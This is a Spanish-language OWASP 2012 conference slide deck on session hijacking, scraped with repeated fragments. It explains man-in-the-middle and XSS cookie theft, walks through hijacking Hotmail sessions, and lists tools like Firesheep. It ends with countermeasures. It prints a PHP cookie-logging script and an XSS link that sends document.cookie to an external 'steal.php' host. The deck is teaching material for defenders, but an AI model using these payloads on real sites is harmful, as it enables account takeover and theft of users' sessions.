Hijacking PDF

Session Hijacking: Secuestro de sesiones en
aplicaciones web empresariales
OMAR PALOMINO HUAMANÍ

KUNAK CONSULTING SAC
omarc320@gmail.com
opalomino@kunak.com.pe
Telef: 973861650
http://www.el-palomo.com
The OWASP Foundation
http://www.owasp.org
OWASP LATAM TOUR 2012
AGRADECIMIENTOS A :
OWASP LATAM TOUR 2012 2

Derechos de Autor y Licencia
Copyright © 2003 – 2012 Fundación OWASP
Este documento es publicado bajo la licencia Creative Commons Attribution ShareAlike 3.0.
Para cualquier reutilización o distribución, usted debe dejar en claro a otros los términos de
la licencia sobre este trabajo.

• Ing. Sistemas y Maestrista de Ing. de
Computación y Sistemas, CEH,
Security+, ITIL v3.
• Consultor en seguridad de
información de KUNAK Consulting.
• Psicólogo que aun no comienza sus
estudios….
• Escritor en mis tiempos libres:
http://www.facebook.com/El.Palomo.Seguridad.Informacion
INDICE
1. Introducción
• ¿Qué es el session hijacking?
• Objetivo de la presentación
• Ejercicio 1: Demostración de la facilidad del robo de sesiones
2. ¿Soy vulnerable?
• Técnicas y métodos de explotación
• Escenarios de ataque:
• Ejercicio 2: Hombre en el medio (MiTM)
• Ejercicio 3: Cross Site Scripting (XSS)
3. Robo de sesiones en aplicaciones web comerciales: Hotmail,

Facebook y Wordpress
4. Técnicas y método para evitar el secuestro/robo de sesiones
5. Conclusiones

RESUMEN
Secuestro de Herramientas
¿Cómo funciona el Conclusiones y
sesiones de de secuestro de
secuestro de sesiones? contramedidas
forma manual sesiones
¿Qué es session hijacking?
 Es el secuestro/robo de sesiones (identificación) de usuarios

para lograr acceso privilegiado a una aplicación web
comprometiendo la integridad y confidencialidad de la
información.

RESUMEN
IMPORTANCIA
 La inadecuada gestión de sesiones en aplicaciones web

empresariales se ha convertido en la tercera vulnerabilidad en
aplicaciones web (OWASP Top 10 – 2010)
 El impacto de explotar esta vulnerabilidad es CRÍTICO debido a

la exposición de información restringida para el negocio.

Funcionamiento: Man in the middle
El usuario ha ingresado
1 normalmente a una aplicación

web comercial o corporativo,
como:
• Hotmail
• Facebook
• Aplicaciones web
particulares (corporativos)
2
El atacante encuentra un
mecanismo para
Importante: averiguar el identificador de
El usuario (la víctima) no se entera que su sesión SESIÓN y realizar el secuestro
de la sesión del usuario.
de aplicación web ha sido vulnerada.

Funcionamiento: Cross Site Scripting

1. Un usuario normal ingresa a la
App. Web y ejecuta el código
2 Javascript.
2. El código Javascript envía el

código de Sesión al servidor web
externo.
1
1. El usuario malicioso prepara un
servidor web externo para
almacenar las sesiones.
2. El usuarios malicioso coloca
código JavaScript sobre la App.
Importante: Web Vulnerable.
Un usuario perspicaz puede darse cuenta de la
inserción de código malicioso en la página web. 9
<?php
Funcionamiento: Cross Site Scripting
$session = $_GET["cookie"];
$date = date("l ds of F Y h:i:s A");
$user_agent =
$_SERVER['HTTP_USER_AGENT'];
$file = fopen('log.txt','a');
fwrite($file, "DATE: $date || USER
AGENT: $user_agent || COOKIE:
$session \n");
fclose($file);
header("Location:
http://XXXXXXX/hijacking/listado.php");
1
?>
<a href="#"
onClick=document.location="htt
p://192.168.1.48/steal.php?cook
ie="+escape(document.cookie);>
Ver aqui los detalles</a>
Importante:
Un usuario perspicaz puede darse cuenta de la inserción de
código malicioso en la página web. 10
¿Por qué sucede esto? Cuando el usuario ingresa a una página web:
1. Se crea una sesión aleatoria en el servidor
1 web , esta sesión se almacena en una cookie

o en una sesión .
2. Esta cookie viaja por la web cada vez que el
cliente navega por la aplicación. La cookie
contiene un identificador de sesión.
2 1. El atacante realiza un ataque para conseguir

la sesión del usuario:
 Hombre en el medio (Man in the middle –

Esto sucede porque: MiTM)
 Predecir el identificador de sesión (Predict
 La transmisión de la sesión viaja en Session)
 Cross site scripting (XSS)
texto plano (MITM)  Otros de menos probabilidad
 Cross Site Scripting (XSS)
2. El atacante modifica la cookie e ingresa a la
 Algoritmo débil de ID de sesión (sesiones aplicación web con el contenido restringido de
predecibles o muy pequeñas). la víctima.
 Incorrecta configuración del bloqueo de sesiones.
 Sesiones que nunca expiran.
Vamos a la práctica
Aplicación web PHP :
1. Capturamos la sesión mediante la técnica de hombre en el
medio.
2. Identificamos la cookie y el número de sesión.
3. Modificamos la cookie mediante una herramienta: Advanced
Cookie Manager.
4. Accedemos a la aplicación sin usuario ni contraseña.
Aplicaciones web en internet (HOTMAIL):

1. Capturamos la sesión mediante la técnica de hombre en el
medio.
2. Identificamos la cookie: RPSTAuth
3. Modificamos la cookie mediante una herramienta: Advanced
Cookie Manager.
4. Accedemos a la aplicación sin usuario ni contraseña.

EJEMPLOS
Debemos automatizar el ataque….
• Ferret: Herramienta para formatear el archivo PCAP producto del sniffing.

Hamster y Ferret • Hamster: Proxy que muestra las cookies formateadas por Ferret.
• Herramientas que funcionan en Windows y Linux.
• Plugin de Mozilla Firefox

Firesheep • Automatiza de manera muy rápida el robo de sesiones.
• A la fecha (2012) el plugin está descontinuado.

Greasemonkey • Permite ingresar la cookie capturada mediante MITM

Debemos automatizar el ataque….
Greasemonkey / • Plugin de Mozilla Firefox

Wireshark Cookie Dump • Permite ingresar la cookie capturada mediante MITM


Firesheep • Automatiza de manera muy rápida el robo de sesiones.
• A la fecha (2012) el plugin está descontinuado.
1. El atacante realiza un
ataque para conseguir la
sesión del usuario
(MITM).
2. Firesheep coge el
identificador de sesión y
te permite ingresar a la
aplicación de la manera
más fácil y sencilla.

EJEMPLOS
Summary &
Conclusion
UTILIZAR CONEXIONES SSL PARA TODA LA PÁGINA WEB Y NO

SÓLO PARA EL LOGIN DE APLICACIONES WEB.
REALIZAR UN CORRECTO FILTRADO DE VARIABLES EN

APLICACIONES WEB PARA EVITAR ATAQUES XSS.
EVITAR UTILIZAR REDES PÚBLICAS, ASEGURASE HACERLO A

TRAVÉS DE UNA CONEXIÓN VPN.
CONFIGURAR TODOS LOS SERVICIOS POSIBLES A TRAVÉS DE HTTPS:

Hotmail, Facebook, Twitter, etc.

Preguntas

Session Hijacking: Secuestro de sesiones en
aplicaciones web empresariales
OMAR PALOMINO HUAMANÍ

KUNAK CONSULTING SAC
omarc320@gmail.com
opalomino@kunak.com.pe
Telef: 973861650

Hijacking PDF

Cargado por

Información del documento

Título original

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Hijacking PDF

Cargado por

Copyright:

Formatos disponibles

Session Hijacking: Secuestro de sesiones en

aplicaciones web empresariales

OMAR PALOMINO HUAMANÍ

OWASP LATAM TOUR 2012 2

The OWASP Foundation

3. Robo de sesiones en aplicaciones web comerciales: Hotmail,

4. Técnicas y método para evitar el secuestro/robo de sesiones

OWASP LATAM TOUR 2012 5

¿Qué es session hijacking?

 Es el secuestro/robo de sesiones (identificación) de usuarios

OWASP LATAM TOUR 2012 6

 La inadecuada gestión de sesiones en aplicaciones web

 El impacto de explotar esta vulnerabilidad es CRÍTICO debido a

OWASP LATAM TOUR 2012 7

Funcionamiento: Man in the middle

1 normalmente a una aplicación

OWASP LATAM TOUR 2012 8

Funcionamiento: Cross Site Scripting

2. El código Javascript envía el

1. Se crea una sesión aleatoria en el servidor

1 web , esta sesión se almacena en una cookie

2 1. El atacante realiza un ataque para conseguir

 Hombre en el medio (Man in the middle –

Aplicaciones web en internet (HOTMAIL):

OWASP LATAM TOUR 2012

Debemos automatizar el ataque….

• Ferret: Herramienta para formatear el archivo PCAP producto del sniffing.

• Plugin de Mozilla Firefox

• Plugin de Mozilla Firefox

OWASP LATAM TOUR 2012

Debemos automatizar el ataque….

Greasemonkey / • Plugin de Mozilla Firefox

OWASP LATAM TOUR 2012

• Plugin de Mozilla Firefox

OWASP LATAM TOUR 2012

UTILIZAR CONEXIONES SSL PARA TODA LA PÁGINA WEB Y NO

REALIZAR UN CORRECTO FILTRADO DE VARIABLES EN

EVITAR UTILIZAR REDES PÚBLICAS, ASEGURASE HACERLO A

CONFIGURAR TODOS LOS SERVICIOS POSIBLES A TRAVÉS DE HTTPS:

OWASP LATAM TOUR 2012 19

The OWASP Foundation

OMAR PALOMINO HUAMANÍ

También podría gustarte